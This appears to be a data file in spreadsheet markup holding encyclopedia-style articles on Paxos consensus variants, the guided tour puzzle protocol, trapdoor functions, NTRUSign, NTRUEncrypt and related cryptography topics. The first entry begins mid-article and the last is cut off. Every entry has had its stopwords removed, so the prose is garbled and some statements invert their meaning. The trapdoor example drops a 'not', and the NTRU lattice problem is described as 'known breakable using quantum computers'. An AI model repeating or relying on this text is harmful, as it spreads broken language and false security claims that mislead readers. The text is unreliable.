phase2a action communicates process knows v.""a proposer send proposal leader rather coordinators. however, requires result leader-selection algorithm broadcast proposers, might expensive. might better proposer send proposal coordinators. case, coordinators need know leader is.)"instead acceptor sending accepted messages learner, acceptors send accepted messages leader leader inform learners value chosen. however, adds extra message delay."finally, observe phase unnecessary round leader round begin round sending accept! message proposed value." cheap paxos cheap paxos extends basic paxos tolerate failures main processors auxiliary processors dynamically reconfiguring failure. this reduction processor requirements comes expense liveness; many main processors fail short time, system must halt auxiliary processors reconfigure system. during stable periods, auxiliary processors take part protocol. "with processors processor cannot distinguish failure processor failure communication medium. third processor needed. however, third processor participate choosing sequence commands. must take action case fails, nothing either continues operate system itself. third processor therefore small/slow/cheap one, processor primarily devoted tasks." message flow: cheap multi-paxos example involving three main acceptors, auxiliary acceptor quorum size three, showing failure main processor subsequent reconfiguration: acceptors proposer main learner phase x-----------&gt;|-&gt;|-&gt;| accept!(n,i,v) fail! |&lt;-----------x--x---------------&gt;| accepted(n,i,v) failure detected (only accepted) x-----------&gt;|-&gt;|-------&gt;| accept!(n,i,v) (re-transmit, include aux) |&lt;-----------x--x--------x------&gt;| accepted(n,i,v) reconfigure quorum x-----------&gt;|-&gt;| accept!(n,i+1,w) (aux participating) |&lt;-----------x--x---------------&gt;| accepted(n,i+1,w) fast paxos fast paxos generalizes basic paxos reduce end-to-end message delays. basic paxos, message delay client request learning message delays. fast paxos allows message delays, requires system composed acceptors tolerate faults (instead classic 2f+1), client send request multiple destinations. intuitively, leader value propose, client could send accept! message acceptors directly. acceptors would respond basic paxos, sending accepted messages leader every learner achieving message delays client learner. leader detects collision, resolves collision sending accept! messages round accepted usual. this coordinated recovery technique requires four message delays client learner. final optimization occurs leader specifies recovery technique advance, allowing acceptors perform collision recovery themselves. thus, uncoordinated collision recovery occur three message delays (and message delays learners also acceptors). message flow: fast paxos, non-conflicting client leader acceptor learner x---------&gt;|-&gt;|-&gt;|-&gt;| any(n,i,recovery) x-------------------&gt;|-&gt;|-&gt;|-&gt;| accept!(n,i,w) |&lt;---------x--x--x--x------&gt;|-&gt;| accepted(n,i,w) |&lt;------------------------------------x--x response(w) message flow: fast paxos, conflicting proposals conflicting proposals coordinated recovery. note: protocol specify handle dropped client request. client leader acceptor learner concurrent conflicting proposals received different order acceptors x--------------?|-?|-?|-?| accept!(n,i,v) x-----------------?|-?|-?|-?| accept!(n,i,w) acceptors disagree value |&lt;-------x--x-&gt;|-&gt;|-----&gt;|-&gt;| accepted(n,i,v) |&lt;-------|&lt;-|&lt;-x--x-----&gt;|-&gt;| accepted(n,i,w) detect collision recover x-------&gt;|-&gt;|-&gt;|-&gt;| accept!(n+1,i,w) |&lt;-------x--x--x--x-----&gt;|-&gt;| accepted(n+1,i,w) |&lt;---------------------------------x--x response(w) conflicting proposals uncoordinated recovery. client leader acceptor learner x-------&gt;|-&gt;|-&gt;|-&gt;| any(n,i,recovery) concurrent conflicting proposals received different order acceptors x--------------?|-?|-?|-?| accept!(n,i,v) x-----------------?|-?|-?|-?| accept!(n,i,w) acceptors disagree value |&lt;-------x--x-&gt;|-&gt;|-----&gt;|-&gt;| accepted(n,i,v) |&lt;-------|&lt;-|&lt;-x--x-----&gt;|-&gt;| accepted(n,i,w) detect collision recover |&lt;-------x--x--x--x-----&gt;|-&gt;| accepted(n+1,i,w) |&lt;---------------------------------x--x response(w) message flow: fast paxos uncoordinated recovery, collapsed roles (merged acceptor/learner roles) client servers x-&gt;|-&gt;|-&gt;| any(n,i,recovery) concurrent conflicting proposals received different order servers x--------?|-?|-?|-?| accept!(n,i,v) x-----------?|-?|-?|-?| accept!(n,i,w) servers disagree value x&lt;&gt;x-&gt;|-&gt;| accepted(n,i,v) |&lt;-|&lt;-x&lt;&gt;x accepted(n,i,w) detect collision recover x&lt;&gt;x&lt;&gt;x&lt;&gt;x accepted(n+1,i,w) |&lt;-----------x--x--x--x response(w) generalized paxos generalized consensus explores relationship operations replicated state machine consensus protocol implements main discovery involves optimizations paxos conflicting proposals could applied order. i.e., proposed operations commutative operations state machine. cases, conflicting operations accepted, avoiding delays required resolving conflicts re-proposing rejected operations. this concept generalized ever-growing sequences commutative operations, known stable (and thus executed). protocol tracks sequences ensuring proposed operations sequence stabilized allowing operation non-commuting become stable. example order illustrate generalized paxos, example shows message flow concurrently executing clients replicated state machine implementing read/write operations distinct registers note table indicates operations non-commutative. possible sequence operations &lt;1:read(a), 2:read(b), 3:write(b), 4:read(b), 5:read(a), 6:write(a)&gt; since 5:read(a) commutes 3:write(b) 4:read(b), possible permutation equivalent previous order following: &lt;1:read(a), 2:read(b), 5:read(a), 3:write(b), 4:read(b), 6:write(a)&gt; practice, commute occurs operations proposed concurrently. message flow: generalized paxos (example) responses shown. note: message abbreviations differ previous message flows specifics protocol, full discussion. client leader acceptor learner leader begins round x-----&gt;|-&gt;|-&gt;| prepare(n) |&lt;-----x- promise(n,null) x-----&gt;|-&gt;|-&gt;| phase2start(n,null) concurrent commuting proposals x------- ?|-----?|-?|-?| propose(reada) x-----------?|-----?|-?|-?| propose(readb) x------x--------------&gt;|-&gt;| accepted(n,&lt;reada,readb&gt;) |&lt;--------x--x--------&gt;|-&gt;| accepted(n,&lt;readb,reada&gt;) conflict, accepted stable &lt;reada, readb&gt; concurrent conflicting proposals x-----------?|-----?|-?|-?| propose(&lt;writeb,reada&gt;) x--------?|-----?|-?|-?| propose(readb) x------x--------------&gt;|-&gt;| accepted(n,&lt;writeb,reada&gt; &lt;readb&gt;) |&lt;--------x--x--------&gt;|-&gt;| accepted(n,&lt;readb&gt; &lt;writeb,reada&gt;) conflict detected, leader chooses commutative order: &lt;reada, writeb, readb&gt; x-----&gt;|-&gt;|-&gt;| phase2start(n+1,v) |&lt;-----x- x--------&gt;|-&gt;| accepted(n+1,v) stable &lt;reada, readb&gt; &lt;reada, writeb, readb&gt; more conflicting proposals x-----------?|-----?|-?|-?| propose(writea) x--------?|-----?|-?|-?| propose(reada) x------x--------------&gt;|-&gt;| accepted(n+1,&lt;writea&gt; &lt;reada&gt;) |&lt;--------x- x--------&gt;|-&gt;| accepted(n+1,&lt;reada&gt; &lt;writea&gt;) leader chooses order: &lt;writea, reada&gt; x-----&gt;|-&gt;|-&gt;| phase2start(n+2,w) |&lt;-----x- x--------&gt;|-&gt;| accepted(n+2,w) stable &lt;reada, readb&gt; &lt;reada, writeb, readb&gt; &lt;writea, reada&gt; performance message flow shows generalized paxos leverage operation semantics avoid collisions spontaneous ordering network fails. this allows protocol practice quicker fast paxos. however, collision occurs, generalized paxos needs additional round trips recover. this situation illustrated operations writeb readb schema. general case, round trips unavoidable come fact multiple commands accepted round. this makes protocol expensive paxos conflicts frequent. hopefully possible refinements generalized paxos possible improve recovery time. first, coordinator part every quorum acceptors (round said centered), recover round collision round coordinator skips phase proposes phase sequence accepted last round this reduces cost recovery single round trip. second, rounds unique identical centered quorum, acceptor detects collision round spontaneously proposes round sequence suffixing sequence accepted round coordinator (ii) greatest non-conflicting prefix accepted round instance, coordinator acceptor accepted respectively round &lt;writeb, readb&gt; &lt;readb, reada&gt; acceptor spontaneously accept &lt;writeb, readb, reada&gt; round n+1. with variation, cost recovery single message delay obviously optimal. notice unique quorum round harm liveness. this comes fact process quorum read quorum prepare phase next rounds. byzantine paxos paxos also extended support arbitrary failures participants, including lying, fabrication messages, collusion participants, selective non-participation, etc. these types failures called byzantine failures, solution popularized lamport.byzantine paxos introduced castro liskov adds extra message (verify) acts distribute knowledge verify actions processors: message flow: byzantine multi-paxos, steady state client proposer acceptor learner x--------&gt;| request x---------&gt;|-&gt;|-&gt;| accept!(n,i,v) x&lt;&gt;x&lt;&gt;x verify(n,i,v) broadcast |&lt;---------x--x--x------&gt;|-&gt;| accepted(n,v) |&lt;---------------------------------x--x response(v) fast byzantine paxos introduced martin alvisi removes extra delay, since client sends commands directly acceptors. note accepted message fast byzantine paxos sent acceptors learners, fast paxos sends accepted messages learners): message flow: fast byzantine multi-paxos, steady state client acceptor learner x-----&gt;|-&gt;|-&gt;| accept!(n,i,v) x&lt;&gt;x&lt;&gt;x------&gt;|-&gt;| accepted(n,i,v) broadcast |&lt;-------------------x--x response(v) failure scenario protocols; each learner waits receive identical messages different acceptors. occur, acceptors also aware (since exchanged other's messages broadcast round), correct acceptors re-broadcast agreed value: message flow: fast byzantine multi-paxos, failure client acceptor learner acceptor faulty x-----&gt;|-&gt;|-&gt;! accept!(n,i,v) x&lt;&gt;x&lt;&gt;x------&gt;|-&gt;| accepted(n,i,{v,w}) broadcast learners receive different commands correct acceptors notice error choose x&lt;&gt;x&lt;&gt;x------&gt;|-&gt;| accepted(n,i,v) broadcast |&lt;-------------------x--x response(v) adapting paxos rdma networks with emergence high speed reliable datacenter networks support remote (rdma), substantial interest optimizing paxos leverage hardware offloading, network interface card network routers provide reliability network-layer congestion control, freeing host tasks. derecho paxos library open-source paxos implementation explores option.derecho offers classic paxos, data durability across full shutdown/restart sequences, vertical paxos (atomic multicast), in-memory replication state-machine synchronization. paxos protocols employed derecho needed adapted maximize asynchronous data streaming remove sources delay leader's critical path. enables derecho sustain full bidirectional rdma data rate. contrast, although traditional paxos protocols migrated rdma network simply mapping message send operations native rdma operations, leaves round-trip delays critical path. high-speed rdma networks, even small delays large enough prevent utilization full potential bandwidth. production paxos google uses paxos algorithm chubby distributed lock service order keep replicas consistent case failure. chubby used bigtable production google analytics products. google spanner megastore paxos algorithm internally. openreplica replication service uses paxos maintain replicas open access system enables users create fault-tolerant objects. provides high performance concurrent rounds flexibility dynamic membership changes. supposedly uses paxos algorithm volume controller product implement general purpose fault-tolerant virtual machine used configuration control components storage virtualization services offered cluster. (original research paper) microsoft uses paxos autopilot cluster management service bing, windows server failover clustering. wandisco implemented paxos within dcone active-active replication technology. xtreemfs uses paxos-based lease negotiation algorithm fault-tolerant consistent replication file data metadata. heroku uses doozerd implements paxos consistent distributed data store. ceph uses paxos part monitor processes agree osds cluster. clustrix distributed database uses paxos distributed transaction resolution. neo4j graph database implements paxos, replacing apache zookeeper v1.9 apache cassandra nosql database uses paxos light weight transaction feature amazon elastic container services uses paxos maintain consisten</t>
  </si>
  <si>
    <t>Guided tour puzzle protocol</t>
  </si>
  <si>
    <t>guided tour puzzle (gtp) protocol cryptographic protocol mitigating application layer denial service attacks. aims overcome shortcoming computation-based puzzle protocols, clients required compute hard memory-bound puzzles favor clients abundant computational resources. guided tour puzzle protocol seen form proof-of-work (pow) protocol. overview protocol steps guided tour puzzle protocol similar client puzzle protocol. clients required complete guided tour puzzle prior receiving service server, server suspects currently denial service attack load exceeds pre-defined threshold. simply put, guided tour puzzle tour needs completed taking multiple round-trips special nodes, called tour guides, sequential order. called guided tour, order tour guides visited unknown client, tour guide direct client towards next tour guide client complete tour correct order. single tour guide appear multiple times tour, term stop used denote single appearance tour guide tour. client knows tour guide next stop, completing visit current stop.solving guided tour puzzle essentially equal completing guided tour correct order. starting first stop, client contacts stop receives reply. each reply contains unique token. token reply message current stop used computing address next stop tour guide. address first stop tour guide computed using token contained server's first reply message informs client start puzzle process.the client must send token received current stop tour guide next stop tour guide, input token calculation function. token received last stop tour guide plus token server's puzzle message sent server proof completion tour. server efficiently validate tokens, grants service client proving validity. protocol steps before guided tour puzzle start, {\displaystyle tour guides system, {\displaystyle n\geq meanwhile, server establishes shared secret {\displaystyle k_{js}} tour guide {\displaystyle g_{j}} using secure channel, {\displaystyle 0\leq j&lt;n} server keeps short-lived secret {\displaystyle k_{s}} computing first hash value returned client part puzzle message. puzzle message also contains length tour {\displaystyle used control difficulty guided tour puzzle. figure shows example guided tour {\displaystyle n=2} {\displaystyle l=5} details protocol step guided tour puzzle protocol explained following. service request: client {\displaystyle sends service request server. server load normal, client's request serviced usual; server overloaded, proceeds initial puzzle generation step. initial puzzle generation: server replies client {\displaystyle puzzle message informs client complete guided tour. puzzle message contains length tour {\displaystyle hash value {\displaystyle h_{0}} server computes {\displaystyle h_{0}} using following formula: {\displaystyle h_{0}=hash(a_{x}\;||\;l\;||\;ts\;||\;k_{s})} where, {\displaystyle means concatenation, {\displaystyle a_{x}} address unique value) client {\displaystyle {\displaystyle coarse timestamp, {\displaystyle hash} cryptographic hash function sha-1.puzzle solving: client computes index tour guide {\displaystyle stop tour using following formula: {\displaystyle s_{l}=(h_{l-1}\;mod\;n)} where, {\displaystyle 0&lt;l\leq when contacted client {\displaystyle tour guide {\displaystyle g_{j}} computes hash value {\displaystyle h_{l}} {\displaystyle 0&lt;l\leq using formula: {\displaystyle h_{l}=hash(h_{l-1}\;||\;l\;||\;l\;||\;a_{x}\;||\;ts\;||\;k_{js})} where, {\displaystyle means {\displaystyle stop client's tour, {\displaystyle k_{js}} shared tour guide {\displaystyle g_{j}} server. after client {\displaystyle receives server's reply message, starts guided tour computing index {\displaystyle s_{1}} first tour guide using formula {\displaystyle s_{l}} client sends values {\displaystyle h_{0}} {\displaystyle {\displaystyle tour guide {\displaystyle g_{s_{1}}} second value denotes stop tour client currently response, client receives hash value {\displaystyle h_{1}} tour guide {\displaystyle g_{s_{1}}} {\displaystyle h_{1}} computed using formula {\displaystyle h_{l}} client {\displaystyle repeats process {\displaystyle l-1} times contacts tour guides {\displaystyle g_{s_{2}},g_{s_{3}},...,g_{s_{l}}} reply message last-stop tour guide {\displaystyle g_{s_{l}}} contains last hash value {\displaystyle h_{l}} client {\displaystyle sends {\displaystyle h_{0},\;h_{l}} server puzzle answer.puzzle verification: server receives request client {\displaystyle puzzle answer {\displaystyle h'_{0}} {\displaystyle h'_{l}} attached, first checks {\displaystyle h'_{0}} equal {\displaystyle h_{0}} computed using formula {\displaystyle h_{0}} server computes {\displaystyle h_{l}} repeatedly using formula {\displaystyle h_{l}} verifies {\displaystyle h'_{l}} equal {\displaystyle h_{l}} hash values valid, server allocates resources process client's request. since server knows shared keys {\displaystyle k_{1s},k_{2s},\dots ,k_{ns}} compute chain hashes {\displaystyle h_{1},h_{2},...,h_{l}} without contacting tour guide. loose time synchronization server tour guides required order compute hash value server tour guides. comparison puzzle protocols cpu-bound computational puzzle protocols, client puzzle protocol, mitigate effect denial service attack, attacker wants overwhelm server, puzzles compute, must computational resources. clients strong computational power solve puzzles much higher rate destitute clients, undesirably take server resources.another crucial shortcoming computational puzzle protocols clients, including legitimate clients, required perform cpu-intensive computations contribute meaningful service application. guided tour puzzle protocol enforces delay clients round trip delays, clients' requests arrive rate sustainable server. advantage using round-trip delays, opposed hard computational problems, round trip delay small packet determined mostly processing delays, queuing delays, propagation delays intermediate routers, therefore beyond control hosts (clients). such, even attacker abundant computational resources cannot prioritize poorly provisioned legitimate clients.furthermore, guided tour puzzle protocol, computation required client trivial. since length guided tour usually small number order tens lower, bandwidth overhead completing guided tour also trivial. result, clients burdened heavy computations (that usually required cpu-bound memory-bound puzzle protocols). also proof-of-work system client puzzle protocol captcha references external links program annual computer security applications conference 2009</t>
  </si>
  <si>
    <t>PRF advantage</t>
  </si>
  <si>
    <t>cryptography, pseudorandom-function advantage (prf advantage) algorithm pseudorandom function family measure effectively algorithm distinguish member family random oracle. consequently, maximum pseudorandom advantage attainable algorithm fixed amount computational resources measure well function family emulates random oracle. adversary algorithm access oracle apply function inputs sent algorithm sends oracle number queries deciding whether oracle random oracle simply instance pseudorandom function family. also chance oracle random oracle chance member function family. pseudorandom advantage algorithm defined times probability algorithm guesses correctly minus one. references external links http://cseweb.ucsd.edu/~mihir/papers/gb.html</t>
  </si>
  <si>
    <t>Trapdoor function</t>
  </si>
  <si>
    <t>theoretical computer science cryptography, trapdoor function function easy compute direction, difficult compute opposite direction (finding inverse) without special information, called "trapdoor". trapdoor functions special case one-way functions widely used public-key cryptography.in mathematical terms, trapdoor function, exists secret information given f(x) easy compute consider padlock key. trivial change padlock open closed without using key, pushing shackle lock mechanism. opening padlock easily, however, requires used. here trapdoor padlock trapdoor function. example simple mathematical trapdoor "6895601 product prime numbers. what numbers?" typical "brute-force" solution would dividing 6895601 several prime numbers finding answer. however, told 1931 numbers, find answer entering "6895601 1931" calculator. this example sturdy trapdoor function modern computers guess possible answers within second sample problem could improved using product much larger primes. trapdoor functions came prominence cryptography mid-1970s publication asymmetric public-key) encryption techniques diffie, hellman, merkle. indeed, diffie hellman (1976) coined term. several function classes proposed, soon became obvious trapdoor functions harder find initially thought. example, early suggestion schemes based subset problem. this turned rather quickly unsuitable. 2004, best known trapdoor function (family) candidates rabin families functions. both written exponentiation modulo composite number, related problem prime factorization. functions related hardness discrete logarithm problem (either modulo prime group defined elliptic curve) known trapdoor functions, known "trapdoor" information group enables efficient computation discrete logarithms. trapdoor cryptography specific aforementioned meaning confused backdoor (these frequently used interchangeably, incorrect). backdoor deliberate mechanism added cryptographic algorithm (e.g., pair generation algorithm, digital signing algorithm, etc.) operating system, example, permits unauthorized parties bypass subvert security system fashion. definition trapdoor function collection one-way functions subsets binary strings 1}*, satisfying following conditions: there exists probabilistic polynomial time (ppt) sampling algorithm s.t. gen(1n) satisfies (n), polynomial. each called trapdoor corresponding each trapdoor efficiently sampled. given input also exists algorithm outputs that efficiently sampled. exists algorithm correctly computes exists algorithm s.t. fk(x), fk(y) fk(x). that given trapdoor, easy invert. without trapdoor algorithm, probability correctly invert (i.e., given fk(x), find pre-image fk(x' fk(x)) negligible.if function collection one-way permutation, collection also called trapdoor permutation. examples following examples, always assume difficult factorize large composite number (see integer factorization). assumption example, inverse {\displaystyle {\displaystyle modulo {\displaystyle \phi (n)} (euler's totient function {\displaystyle trapdoor: {\displaystyle f(x)=x^{e}\mod factorization {\displaystyle n=pq} known, {\displaystyle \phi (n)=(p-1)(q-1)} computed. with inverse {\displaystyle {\displaystyle computed {\displaystyle d=e^{-1}\mod {\phi (n)}} given {\displaystyle y=f(x)} find {\displaystyle x=y^{d}\mod n=x^{ed}\mod n=x\mod hardness follows assumption. rabin's quadratic residue assumption {\displaystyle large composite number {\displaystyle n=pq} {\displaystyle {\displaystyle large primes {\displaystyle p\equiv 3{\pmod {4}},q\equiv 3{\pmod {4}}} kept confidential adversary. problem compute {\displaystyle given {\displaystyle {\displaystyle a\equiv z^{2}{\pmod {n}}} trapdoor factorization {\displaystyle with trapdoor, solutions given {\displaystyle cx+dy,cx-dy,-cx+dy,-cx-dy} {\displaystyle a\equiv x^{2}{\pmod {p}},a\equiv y^{2}{\pmod {q}},c\equiv 1{\pmod {p}},c\equiv 0{\pmod {q}},d\equiv 0{\pmod {p}},d\equiv 1{\pmod {q}}} chinese remainder theorem details. note given primes {\displaystyle {\displaystyle find {\displaystyle x\equiv a^{\frac {p+1}{4}}{\pmod {p}}} {\displaystyle y\equiv a^{\frac {q+1}{4}}{\pmod {q}}} here conditions {\displaystyle p\equiv 3{\pmod {4}}} {\displaystyle q\equiv 3{\pmod {4}}} guarantee solutions {\displaystyle {\displaystyle well defined. also one-way function notes references diffie, hellman, (1976), "new directions cryptography" (pdf), ieee transactions information theory, (6): 644–654, citeseerx 10.1.1.37.9720, doi:10.1109/tit.1976.1055638 pass, rafael, course cryptography (pdf), retrieved november 2015 goldwasser, shafi, lecture notes cryptography (pdf), retrieved november 2015 ostrovsky, rafail, foundations cryptography (pdf), retrieved november 2015 dodis, yevgeniy, introduction cryptography lecture notes (fall 2008), retrieved december 2015 lindell, yehuda, foundations cryptography (pdf), retrieved december 2015</t>
  </si>
  <si>
    <t>Cryptology ePrint Archive</t>
  </si>
  <si>
    <t>cryptology eprint archive electronic archive (eprint) results field cryptography, maintained international association cryptologic research. contains articles covering many recent advances cryptography, necessarily undergo refereeing process (yet). also arxiv electronic colloquium computational complexity external links eprint archive</t>
  </si>
  <si>
    <t>Selected Areas in Cryptography</t>
  </si>
  <si>
    <t>selected areas cryptography (sac) international cryptography conference (originally workshop) held every august canada since 1994. first workshop organized carlisle adams, henk meijer, stafford tavares paul oorschot. through 1999, hosted either queen's university carleton university, starting 2000, locations ranged across canada. featured research presentations many cryptographic topics, traditional focus design analysis block ciphers. regarded high-quality venue presenting cryptographic results, cryptography conference held annually canada. since 2003, included invited lecture called stafford tavares lecture, honor original organizers strongest supporters. each year, features four topics: design analysis symmetric primitives cryptosystems including block stream ciphers, hash functions, algorithms, authenticated encryption schemes. efficient implementations symmetric public algorithms. mathematical algorithmic aspects applied cryptology. special topic selected current co-chairs vary year year.the "sac" acronym also tongue-in-cheek reference strict avalanche criterion, cryptographic property defined terms boolean functions. external links main conference page</t>
  </si>
  <si>
    <t>Transverse redundancy check</t>
  </si>
  <si>
    <t>telecommunications, transverse redundancy check (trc) vertical redundancy check redundancy check synchronized parallel bits applied time, across streams. this requires additional parallel channels check bits. term usually applies single parity bit, although could also used refer larger hamming code. adjective "transverse" often used used combination additional error control coding, longitudinal redundancy check. although parity alone detect correct errors, part system correcting errors. example parity written track track tape. references this article incorporates public domain material general services administration document: "federal standard 1037c". support mil-std-188)</t>
  </si>
  <si>
    <t>NTSC-C</t>
  </si>
  <si>
    <t>ntsc-c regional lockout created 2003 sony computer entertainment official launch playstation gaming system mainland chinese market. mainland chinese market system's original model, called playstation launched throughout 2000, 2001 2002 japan, north america, europe, oceania south east asia, introduced mainland china local mass piracy system. november 2003, sony china chairman hiroshi soda explained situation: sony previously reluctant introduce playstation chinese market piracy problem. changed minds think piracy situation cannot controlled percent, china also many countries regions world. courageous, face reality. however situation changed november 2003 sony china announced playstation (scph-50009 "satin silver" type) planned launched mainland china christmas, official release date december 2003. sales would first limited five large industrialized cities beijing, shanghai, guangzhou, shenzhen chengdu, distribution would start whole country. however, christmas, arguing "unfavorable environment," sony china delayed mainland release next year system's "slim" type pstwo sales limited shanghai guangzhou. meanwhile, kenichi fukunaga, sony japan spokesman tokyo, reportedly declared "the company simply prepared time china launch."the "ntsc/c" regional lockout mainland china specially created system also home ntsc player specific zone regional code compatible bordering countries (japan zone south korea, hong kong, taiwan zone etc.) first batch ntsc/c games released december 2005. along sony computer entertainment japan, third-party publishers included local branches bandai namco among others. ntsc-c pstwo type scph-70006 ("black"). marketing definition stands china. however hong kong, macau taiwan part ntsc-j region initially created japan. term ntsc-c used distinguish regions console video games, televisions ntsc display standards. ntsc-c used name video gaming region continental china, despite country's official standard instead ntsc. games designated part region hardware designated part ntsc-j (that include traditional chinese version hong kong, taiwan, singapore malaysia, instead simplified chinese china), ntsc-us pal-e, stands europe) mostly regional differences (secam also used early 1990s) ntsc standards, also concern copyright protection regional lockout built video game systems games themselves, product released different publishers different continents. notes also atsc standards btsc ntsc ntsc-j ntsc-us pal/e secam</t>
  </si>
  <si>
    <t>Cryptosystem</t>
  </si>
  <si>
    <t>cryptography, cryptosystem suite cryptographic algorithms needed implement particular security service, confidentiality (encryption).typically, cryptosystem consists three algorithms: generation, encryption, decryption. term cipher (sometimes cypher) often used refer pair algorithms, encryption decryption. therefore, term cryptosystem often used generation algorithm important. reason, term cryptosystem commonly used refer public techniques; however "cipher" "cryptosystem" used symmetric techniques. formal definition mathematically, cryptosystem encryption scheme defined tuple {\displaystyle ({\mathcal {p}},{\mathcal {c}},{\mathcal {k}},{\mathcal {e}},{\mathcal {d}})} following properties. {\displaystyle {\mathcal {p}}} called "plaintext space". elements called plaintexts. {\displaystyle {\mathcal {c}}} called "ciphertext space". elements called ciphertexts. {\displaystyle {\mathcal {k}}} called "key space". elements called keys. {\displaystyle {\mathcal {e}}=\{e_{k}:k\in {\mathcal {k}}\}} functions {\displaystyle e_{k}:{\mathcal {p}}\rightarrow {\mathcal {c}}} elements called "encryption functions". {\displaystyle {\mathcal {d}}=\{d_{k}:k\in {\mathcal {k}}\}} functions {\displaystyle d_{k}:{\mathcal {c}}\rightarrow {\mathcal {p}}} elements called "decryption functions".for {\displaystyle e\in {\mathcal {k}}} {\displaystyle d\in {\mathcal {k}}} {\displaystyle d_{d}(e_{e}(p))=p} {\displaystyle p\in {\mathcal {p}}} .note; typically definition modified order distinguish encryption scheme either symmetric-key public-key type cryptosystem. examples classical example cryptosystem caesar cipher. contemporary example cryptosystem. references</t>
  </si>
  <si>
    <t>NTRUSign</t>
  </si>
  <si>
    <t>ntrusign, also known ntru signature algorithm, ntru public-key cryptography digital signature algorithm based signature scheme. original version ntrusign polynomial authentication signature scheme (pass), published cryptec'99. improved version pass named ntrusign, presented rump session asiacrypt 2001 published peer-reviewed form conference 2003. 2003 publication included parameter recommendations 80-bit security. subsequent 2005 publication revised parameter recommendations 80-bit security, presented parameters gave claimed security levels 112, 128, 160, bits, described algorithm derive parameter sets desired security level. ntru cryptosystems, inc. applied patent algorithm. ntrusign involves mapping message random point 2n-dimensional space, ntrusign parameters, solving closest vector problem lattice closely related ntruencrypt lattice. ntrusign claimed faster algorithms security levels, considerably faster high security levels. however, analysis shown original scheme insecure would leak knowledge private key.a redesigned pqntrusign submitted nist post-quantum cryptography standardization competition. based "hash-and-sign" (contrasting fiat–shamir transformation) methodology, claims achieve smaller signature size. ntrusign consideration standardization ieee p1363 working group. security demonstrated 2000 bao, deng signature pass, original version ntrusign, forged easily without knowing private key. ntrusign zero-knowledge signature scheme transcript signatures leaks information private key, first observed gentry szydlo. nguyen regev demonstrated 2006 original unperturbed ntrusign parameter sets attacker recover private signatures.the current proposals perturbations increase transcript length required recover private key: signer displaces point representing message small secret amount signature calculated. ntru claimed least signatures needed, probably considerably more, transcript perturbed signatures enabled useful attack. 2012 attack scheme perturbations presented required thousand signatures standard security parameters.the pqntrusign claims 128-bit classical quantum security given parameter set. references external links most recent ntrusign paper, including parameter sets multiple security levels java implementation ntrusign</t>
  </si>
  <si>
    <t>NTRUEncrypt</t>
  </si>
  <si>
    <t>ntruencrypt public cryptosystem, also known ntru encryption algorithm, ntru lattice-based alternative elliptic curve cryptography (ecc) based shortest vector problem lattice (which known breakable using quantum computers). relies presumed difficulty factoring certain polynomials truncated polynomial ring quotient polynomials small coefficients. breaking cryptosystem strongly related, though equivalent, algorithmic problem lattice reduction certain lattices. careful choice parameters necessary thwart published attacks. since encryption decryption simple polynomial multiplication, operations fast compared asymmetric encryption schemes, rsa, elgamal elliptic curve cryptography. however, ntruencrypt undergone comparable amount cryptographic analysis deployed form. related algorithm ntrusign digital signature algorithm. specifically, ntru operations based objects truncated polynomial ring {\displaystyle r=\mathbb [x]/(x^{n}-1)} convolution multiplication polynomials ring integer coefficients degree n-1: {\displaystyle {\textbf {a}}=a_{0}+a_{1}x+a_{2}x^{2}+\cdots +a_{n-2}x^{n-2}+a_{n-1}x^{n-1}} ntru actually parameterised family cryptosystems; system specified three integer parameters represent maximal degree {\displaystyle n-1} polynomials truncated ring small modulus large modulus, respectively, assumed prime, always larger coprime; four sets polynomials {\displaystyle {\mathcal {l}}_{f},{\mathcal {l}}_{g},{\mathcal {l}}_{m}} {\displaystyle {\mathcal {l}}_{r}} polynomial part private key, polynomial generation public key, message blinding value, respectively), degree {\displaystyle n-1} history ntruencrypt public cryptosystem relatively cryptosystem. first version system, simply called ntru, developed around 1996 three mathematicians (jeffrey hoffstein, jill pipher, joseph silverman). 1996 mathematicians together daniel lieman founded ntru cryptosystems, inc. given patent (now expired) cryptosystem. during last years people working improving cryptosystem. since first presentation cryptosystem, changes made improve performance system security. most performance improvements focused speeding process. till 2005 literature found describes decryption failures ntruencrypt. security, since first version ntruencrypt, parameters introduced seem secure currently known attacks reasonable increase computation power. system fully accepted ieee p1363 standards specifications lattice-based public-key cryptography (ieee p1363.1). because speed ntruencrypt public cryptosystem (see http://bench.cr.yp.to benchmarking results) memory (see below), used applications mobile devices smart-cards. april 2011, ntruencrypt accepted x9.98 standard, financial services industry. public generation sending secret message alice requires generation public private key. public known alice private known bob. generate pair polynomials degree {\displaystyle n-1} coefficients {-1,0,1} required. they considered representations residue classes polynomials modulo {\displaystyle x^{n}-1} polynomial {\displaystyle {\textbf {f}}\in l_{f}} must satisfy additional requirement inverses modulo modulo (computed using euclidean algorithm) exist, means {\displaystyle {\textbf {f}}\cdot {\textbf {f}}_{p}=1{\pmod {p}}} {\displaystyle {\textbf {f}}\cdot {\textbf {f}}_{q}=1{\pmod {q}}} must hold. chosen invertible, back another both {\displaystyle \mathbf _{p}} (and {\displaystyle bob's private key. public generated computing quantity {\displaystyle {\textbf {h}}=p{\textbf {f}}_{q}\cdot {\textbf {g}}{\pmod {q}}.} example: example parameters values therefore polynomials degree system parameters known everybody. polynomials randomly chosen, suppose represented {\displaystyle {\textbf {f}}=-1+x+x^{2}-x^{4}+x^{6}+x^{9}-x^{10}} {\displaystyle {\textbf {g}}=-1+x^{2}+x^{3}+x^{5}-x^{8}-x^{10}} using euclidean algorithm inverse modulo modulo respectively, computed {\displaystyle {\textbf {f}}_{p}=1+2x+2x^{3}+2x^{4}+x^{5}+2x^{7}+x^{8}+2x^{9}{\pmod {3}}} {\displaystyle {\textbf {f}}_{q}=5+9x+6x^{2}+16x^{3}+4x^{4}+15x^{5}+16x^{6}+22x^{7}+20x^{8}+18x^{9}+30x^{10}{\pmod {32}}} which creates public (known alice bob) computing product {\displaystyle {\textbf {h}}=p{\textbf {f}}_{q}\cdot {\textbf {g}}{\pmod {32}}=8-7x-10x^{2}-12x^{3}+12x^{4}-8x^{5}+15x^{6}-13x^{7}+12x^{8}-13x^{9}+16x^{10}{\pmod {32}}} encryption alice, wants send secret message bob, puts message form polynomial coefficients {\displaystyle [-p/2,p/2]} modern applications encryption, message polynomial translated binary ternary representation. after creating message polynomial, alice chooses randomly polynomial small coefficients (not restricted {-1,0,1}), meant obscure message. with bob's public encrypted message computed: {\displaystyle {\textbf {e}}={\textbf {r}}\cdot {\textbf {h}}+{\textbf {m}}{\pmod {q}}} this ciphertext hides alice's messages sent safely bob. example: assume alice wants send message written polynomial {\displaystyle {\textbf {m}}=-1+x^{3}-x^{4}-x^{8}+x^{9}+x^{10}} randomly chosen ‘blinding value’ expressed 